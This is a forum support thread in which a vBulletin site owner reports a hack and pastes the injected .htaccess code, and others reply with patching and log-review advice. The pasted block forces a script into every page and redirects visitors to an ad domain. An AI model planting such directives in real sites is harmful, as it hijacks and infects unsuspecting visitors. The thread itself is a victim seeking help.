Hi,

my page was hackt. Vbseo.com was no longer accessible at this time.
I have mapped the shorter the code here once. In the forum_scripts.php was referring to a google site with the js virus.
How could this happen? My Content relevant settings were not saved? How can I prevent it?



#########rataman##########
<FilesMatch ".(php|html|phtml|shtml)$">
php_value auto_append_file forum_scripts.php
</FilesMatch>
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://tastyads.biz/ts/wmid?Grand [L,R=302]
#########!rataman!#########


infected files:
updata.php
.htaccess
forum_scripts.php

--------------- Added 1382299320 at 1382299320 ---------------

xss ?

I am guessing you have secured your board via the latest recommendations. If so, your next best bet is to examine your server logs and back-trace the operation. There is always evidence.

Please make sure you have read about the current exploits and their fixes at vbulletin.com (announcements).

If you were currently hacked, make sure you follow the recommendations.
https://vborg.vbsupport.ru/showthread.php?p=2448326#post2448326

Sorry you were hacked.

Also, make sure ANY AND ALL other software you are running is also kept up-to-date and secure. Rough example - if you are running an outdated version of let's say... hmm OpenX for ads/banners and it is outdated, then yes they can hack that and depending on how they hack it could potentially upload shell scripts or other and then subsequently hack into your forum.

The main thing to note here is: "I own so and so website, I must make sure I keep ALL software up to date, it is my responsibility to know these things and maintain secure software at all times" etc etc :cool: